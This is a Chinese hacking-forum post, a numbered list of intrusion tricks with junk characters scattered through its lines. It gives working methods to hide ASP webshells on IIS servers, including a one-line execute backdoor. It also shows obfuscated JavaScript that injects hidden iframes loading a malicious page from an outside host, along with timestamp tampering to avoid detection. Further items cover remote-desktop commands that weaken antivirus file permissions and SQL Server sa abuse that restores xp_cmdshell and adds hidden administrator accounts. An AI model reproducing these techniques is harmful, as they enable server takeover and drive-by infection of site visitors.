* _/ d9 F& ^ J5 H53、隐藏ASP后门的两种方法+ _6 S* n* {9 C5 a! o# _ t
1、建立非标准目录:mkdir images..\
- Q# c9 A' \( K1 n# W8 O拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, F" _3 i, q9 J' ~ m/ D通过web访问ASP木马:http://ip/images../news.asp?action=login
' n. U ^" I& Z如何删除非标准目录:rmdir images..\ /s( t% h9 Q8 X7 j
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. T& V2 ~: U2 @mkdir programme.asp
2 o( I" b& {7 P7 U- ^新建1.txt文件内容:<!--#include file=”12.jpg”-->: j% o2 o5 ^7 j. F. c5 S
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 z7 ?& T% @5 @) V# N3 g5 Oattrib +H +S programme.asp A, u* U% b# c q( z9 p4 I1 N. J
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt Q4 s) J$ z% u7 ^* g
# ^' a# a6 Z( C" s1 @
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。- \) O; x- }( Z- E' D- s/ m5 d
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( }9 e& A5 C' p8 F- r7 F) J; Q7 d
55、JS隐蔽挂马
5 k* _9 J! H7 a: [; m1.
) I( l) F; c, }; p# n: pvar tr4c3="<iframe src=ht";+ I+ M6 C$ [- e+ J8 ?
tr4c3 = tr4c3+"tp:/";( k T- ^" K( x( y
tr4c3 = tr4c3+"/ww";
8 \5 w3 i0 H$ s& J. O9 f5 {$ u s8 Otr4c3 = tr4c3+"w.tr4";
: s- c$ \2 j d) a: C. etr4c3 = tr4c3+"c3.com/inc/m";
$ V* g t" U0 C; L' G3 p5 P7 str4c3 = tr4c3+"m.htm style="display:none"></i";
& R5 o9 }9 J3 d: y+ atr4c3 =tr4c3+"frame>'";- }) Q3 L$ A- e( O
document.write(tr4c3);! q0 Z9 c M0 S' p% W
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
- `3 X* p2 S# S4 j. {- v/ s- A3 {3 v2 \0 `8 N9 P
2.
& D; L& {! r3 X6 h7 b* h转换进制,然后用EVAL执行。如
' {" D5 q: y0 R* reval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");% e1 V2 v' M. _: n" W
不过这个有点显眼。; T+ [2 j8 X) U% s8 @
3.' Y. X1 ]8 P6 r' @ y) W7 O
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');3 S( B- y* t! }2 W6 |( r9 o: c- v' h
最后一点,别忘了把文件的时间也修改下。" ]9 }* f$ @0 d* L0 ~0 @ R% T
# X: z! y6 B( l8 R% i! ]% S56.3389终端入侵常用DOS命令
+ E/ k3 B. w o( }: |3 ?6 utaskkill taskkill /PID 1248 /t
$ i! R: ?+ y* y
" D- x8 K. W# y/ otasklist 查进程
" r! F9 S; p/ H/ y
: a; B, k3 ]+ N' G4 @1 ocacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限% x& ^9 C7 l3 _, ]
iisreset /reboot
+ k/ c8 |$ ^/ I, ]$ z: s! [2 C. htsshutdn /reboot /delay:1 重起服务器
7 c0 J; j5 R% W# F" v& c
) B+ d1 H" k7 a" Q, Tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,! d5 U7 u! T' @ p& D/ I
4 ?. Z2 V) p1 n3 s" n+ Y8 ]2 y2 v" {# Bquery user 查看当前终端用户在线情况- a/ f; `8 c; }- D
. G/ ~9 I2 @/ H" ]' g# p8 w要显示有关所有会话使用的进程的信息,请键入:query process *6 Q: L# R- w! N
9 p' H* b# o: R
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) a. \5 u2 H: ~, U8 n2 X# n: J# i& o
/ R9 U! T: ?0 N; Q6 M
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
+ c' a# {" l- G/ X/ u9 I
6 U" c* H3 |- b: j) C( j6 g/ _要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02. m1 v) I9 C/ a- U/ ~+ M
5 e- F9 _+ l! N4 V/ c
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ l, \0 ~0 ?/ V4 }6 i9 O* w
* G8 h0 O/ l! u命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统9 w) X$ C( `$ l; U0 U$ N7 f2 v0 h
+ J0 I; g& \+ y$ E4 y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。8 e: x7 \- i, C) k" H6 ^+ N
# \ H5 t0 S8 d6 g: d4 P命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
: s, X% ]6 [ Q$ ~+ ^# f
$ T9 A3 Y6 D. R56、在地址栏或按Ctrl+O,输入:- t9 E0 J2 c; V
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;, O* W9 |3 t2 B
7 ~2 B8 t" @, Q
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
9 d% j& S# G5 ?- \
3 o0 B q. E, f3 l Z7 @( h( m& H- I57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: r. p- S" |& W/ e用net localgroup administrators是可以看到管理组下,加了$的用户的。2 y8 S- ?9 U: }: w
Y; O, }! K- G% z
58、 sa弱口令相关命令
1 b; e" w, o! N* ?6 c( B! m9 c. L6 x1 O: d5 R) p
一.更改sa口令方法:
4 F0 V$ G; ?( o6 Z. k2 ~% A用sql综合利用工具连接后,执行命令:3 c" }2 a2 m8 d' w7 `* i/ T
exec sp_password NULL,'20001001','sa'
! q e1 l! R1 B2 u$ e ~(提示:慎用!)
0 s; C; l/ s5 F
, |3 s( i8 s. l& ?8 Q' ]二.简单修补sa弱口令.6 z7 O; q/ N$ ]; y. ?
$ O# ?$ M6 ^) o方法1:查询分离器连接后执行:6 E( M" _7 M, V4 A/ |/ H
if exists (select * from
/ Q ?3 x7 C9 q i5 \; Z( qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
( Y" w( V( a& [" c! A5 NOBJECTPROPERTY(id, N'IsExtendedProc') = 1)+ S" T r# Q' E% n
* B( k9 @5 _3 P, }+ ^exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 E, B3 I0 ~/ U1 H7 m$ z
7 `: ~ X$ Z6 o5 y3 H* D
GO
# w- M' _4 \0 Y2 d
7 ~- E: e# D! [" o8 Z& F! x然后按F5键命令执行完毕
' ^# O+ }" R; f- e6 z. S3 `0 @9 ~6 p
方法2:查询分离器连接后
+ u. F! ]2 V6 k* r& B4 a5 j( Q3 p第一步执行:use master2 j$ U+ ]* u, \! y1 n2 O
第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 q7 y3 b5 F7 D( M然后按F5键命令执行完毕2 v4 T0 k! b+ J# R$ i0 v5 M
' t, ^$ u8 f1 a6 E4 Z7 U1 n1 F' b, o# z+ p" N
三.常见情况恢复执行xp_cmdshell.9 O. y" B& t& v9 V* M! ^' v
/ I! {. {$ K7 R0 ?7 r7 X
2 \9 K3 \( ]! L$ r) H* N1 未能找到存储过程'master..xpcmdshell'.9 R7 m/ p; ?/ ^. m6 d) j% V
恢复方法:查询分离器连接后,( G" {- V/ F* l) Q5 H) v5 |; f
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! a. Y) E7 f* t I( t9 p* q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': {+ l' @( ^; V9 C- V
然后按F5键命令执行完毕
' Q6 \6 e0 N" Y/ ^$ f* w, M* r, B
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% Q1 a2 Q6 _: v1 F, `恢复方法:查询分离器连接后,% [4 O: D% p+ S1 @: M7 \3 l& C- }
第一步执行:sp_dropextendedproc "xp_cmdshell"/ l# |. ~9 x& z; [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, K4 O$ e, d! C& F# |$ n然后按F5键命令执行完毕6 v% Z9 Z% ] ?: \) c0 L( [
3 i$ w- U4 v4 V' a
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 l. n- V# |* X% L恢复方法:查询分离器连接后,
[8 C. G8 s4 g8 O第一步执行:exec sp_dropextendedproc 'xp_cmdshell'+ W3 K. I/ r! a) X4 k, S8 c
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 3 q, Z [; w; a: B3 P/ \8 Y
然后按F5键命令执行完毕
0 ?/ s1 J4 m& \9 l ?* O2 }" S! U/ t" e6 A8 U, V# Z
四.终极方法.; q7 R- ]5 l2 s: |! h( c# p0 R
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 G: G0 D% U6 O& _; z. X* h9 d
查询分离器连接后,
4 ]6 F/ Y8 t/ S# ]% W1 @" H2 F( j2000servser系统:
. z$ F: ]: R, o5 K6 U- ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
# q, b% u5 p( Z, ^7 T/ p
- ?" e5 p# t; _" Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 E. R: c- G: M. [1 @+ o& I3 D) c3 v7 C" K+ y( w8 |
xp或2003server系统:
- ?- v [! Y' _# s' o8 [( }% C2 B+ ~( T& k; D# b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; f4 v4 a6 ~2 m: j0 u6 {& [9 v8 f9 S4 z- V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# ^' R% k1 t d/ S- R z; m( w' v4 h, n |
发表于 2012-9-15 14:13:15
收藏
支持
反对